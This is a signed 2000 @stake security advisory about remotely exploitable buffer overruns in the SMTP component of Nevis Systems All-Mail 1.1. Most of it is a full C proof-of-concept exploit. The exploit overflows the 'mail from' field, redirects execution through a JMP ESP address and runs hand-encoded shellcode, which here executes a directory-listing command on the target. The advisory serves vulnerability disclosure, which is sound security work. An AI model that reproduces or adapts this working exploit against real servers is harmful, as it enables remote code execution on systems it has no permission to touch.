[ SOURCE: http://www.secureroot.com/security/advisories/9735364385.html ] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 @stake Inc. www.atstake.com Security Advisory Advisory Name: All-Mail buffer overrun vulnerability Release Date: 10/12/2000 Application: Nevis Systems All-Mail 1.1 Platform: Windows NT 4.0 / 2000 Severity: There are several buffer overflow conditions that could result in execution of arbitrary code or a denial of service. Authors: David Litchfield [dlitchfield@atstake.com] Vendor Status: Vendor alerted - details bellow. Web: www.atstake.com/research/advisories/2000/a101200-2.txt Overview: Nevis System's All-Mail (http://www.n-systems.com/) is a personal and small office mail server written for the Windows platform. There are various buffer overrun vulnerabilities in this server that can allow a remote attacker to gain complete control of the server's execution and execute arbitrary computer code. There are a several methods that can be used to overflow various static buffers in the SMTP component of the server for examples having an overly long "mail from" or "rcpt to" command. Proof of Concept The following code will connect to TCP port 25 on the remote system and then cause the overflow. The code executed here simply spawns a shell, performs a directory listing and pipes the output to a file called "allmail_orun.txt" on the target system. This will allow users to check if their mail server is vulnerable by testing for the file. Cut --------8<---------------------- #include #include #include #include struct sockaddr_in sa; struct hostent *he; SOCKET sock; char hostname[256]=""; int main(int argc, char *argv[]) { int chk=0,count=0; char buffer[500]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPP PQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ11112222333344445555666677778888999 90000aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrr rssssttttuuuuvvvvwwwwxxxxyy"; if(argc == 1) { printf("\n\tUsage: C:\\>%s host\n\tTests for All-Mail buffer overflow\n\tDavid Litchfield 10th October 2000\n\n",argv[0]); return 0; } strncpy(hostname,argv[1],250); // Overwrite the saved return address with 0x77F32836 // This address contains a JMP ESP instruction that // when executed will land us back in our buffer buffer[242]=0x36; buffer[243]=0x28; buffer[244]=0xF3; buffer[245]=0x77; count = 246; // This part of the buffer gets zapped - just put NOPs in buffer[count++]=0x90; buffer[count++]=0x90; buffer[count++]=0x90; buffer[count++]=0x90; buffer[count++]=0x90; buffer[count++]=0x90; buffer[count++]=0x90; buffer[count++]=0x90; buffer[count++]=0x90; // This is where our code starts in earnest // mov esp,ebp buffer[count++]=0x8B; buffer[count++]=0xEC; // With our stack perserved and our code safe we continue // mov ebx,esp buffer[count++]=0x8B; buffer[count++]=0xDC; // mov eax,77F1A986h buffer[count++]=0xB8; buffer[count++]=0x86; buffer[count++]=0xA9; buffer[count++]=0xF1; buffer[count++]=0x77; // xor esi,esi buffer[count++]=0x33; buffer[count++]=0xF6; // push esi buffer[count++]=0x56; // mov ecx, 0xFFFFFFFF buffer[count++]=0xB9; buffer[count++]=0xFF; buffer[count++]=0xFF; buffer[count++]=0xFF; buffer[count++]=0xFF; // sub ecx, 0x0D7 buffer[count++]=0x83; buffer[count++]=0xE9; buffer[count++]=0xD7; // loophere: // sub dword ptr[ebx+0x50],1 buffer[count++]=0x83; buffer[count++]=0x6B; buffer[count++]=0x50; buffer[count++]=0x01; // sub ebx,1 buffer[count++]=0x83; buffer[count++]=0xEB; buffer[count++]=0x01; // sub ecx,1 buffer[count++]=0x83; buffer[count++]=0xE9; buffer[count++]=0x01; // test ecx,ecx buffer[count++]=0x85; buffer[count++]=0xC9; // jne loophere buffer[count++]=0x75; buffer[count++]=0xF2; // add ebx,0x55 buffer[count++]=0x83; buffer[count++]=0xC3; buffer[count++]=0x55; // push ebx buffer[count++]=0x53; // call eax buffer[count++]=0xFF; buffer[count++]=0xD0; // This bunch is our command to run: // cmd.exe /c dir > allmail_orun.txt // but with 1 added to evey character // which is SUBed in the loop above buffer[count++]=0x01; buffer[count++]=0x01; buffer[count++]=0x01; buffer[count++]=0x01; buffer[count++]=0x64; buffer[count++]=0x6e; buffer[count++]=0x65; buffer[count++]=0x2f; buffer[count++]=0x66; buffer[count++]=0x79; buffer[count++]=0x66; buffer[count++]=0x21; buffer[count++]=0x30; buffer[count++]=0x64; buffer[count++]=0x21; buffer[count++]=0x65; buffer[count++]=0x6a; buffer[count++]=0x73; buffer[count++]=0x21; buffer[count++]=0x3f; buffer[count++]=0x21; buffer[count++]=0x62; buffer[count++]=0x6d; buffer[count++]=0x6d; buffer[count++]=0x6e; buffer[count++]=0x62; buffer[count++]=0x6a; buffer[count++]=0x6d; buffer[count++]=0x60; buffer[count++]=0x70; buffer[count++]=0x73; buffer[count++]=0x76; buffer[count++]=0x6f; buffer[count++]=0x2f; buffer[count++]=0x75; buffer[count++]=0x79; buffer[count++]=0x75; buffer[count++]=0x01; buffer[count++]=0x01; buffer[count++]=0x01; if(startWSOCK(hostname)!=0) { printf("Winsock Error!\n"); return 0; } DoBufferOverrun(buffer); return 0; } int startWSOCK(char *swhost) { int err=0; WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD( 2, 0 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { return 2; } if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) { WSACleanup( ); return 3; } if ((he = gethostbyname(swhost)) == NULL) { printf("Host not found.."); return 4; } sa.sin_addr.s_addr=INADDR_ANY; sa.sin_family=AF_INET; memcpy(&sa.sin_addr,he->h_addr,he->h_length); return 0; } int DoBufferOverrun(char *exploit) { int snd, rcv, err, count =0,incount = 0; char resp[200],*loc=NULL; sa.sin_port=htons(25); sock=socket(AF_INET,SOCK_STREAM,0); bind(sock,(struct sockaddr *)&sa,sizeof(sa)); if (sock==INVALID_SOCKET) { closesocket(sock); return 0; } if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0) { closesocket(sock); printf("Failed to connect\n"); return 0; } else { rcv = recv(sock,resp,200,0); snd = send(sock,"helo all-mail.overrun.test\r\n",28,0); rcv = recv(sock,resp,200,0); loc = strstr(resp,"250 HELO accepted"); if(loc == NULL) { printf("Server does not appear to be running All-Mail\nAborting..."); closesocket(sock); return 0; } else { snd = send(sock,"mail from: <",12,0); snd = send(sock,exploit,strlen(exploit),0); snd = send(sock,">\r\n",3,0); printf("Payload sent...allmail_orun.txt should have been created.\n"); } } closesocket(sock); return 0; } Cut -------8<--------- Vendor Response: When informed of these issues the vendor has decided not to support this product any longer and have stated they will inform their customers of what they should do. Recommendation: Switch to another mail server as there will not be a fixed version available. For more advisories: http://www.atstake.com/research/index.html PGP Key: http://www.atstake.com/research/pgp_key.asc Copyright 2000 @stake, Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP 7.0 iQA/AwUBOeXgbFESXwDtLdMhEQK7UACg5BBYYKzDSnXb6JnuffskVKGn2pUAoI1G 9TODImPMfmu4v87sWkw2sLjd =YZd9 -----END PGP SIGNATURE-----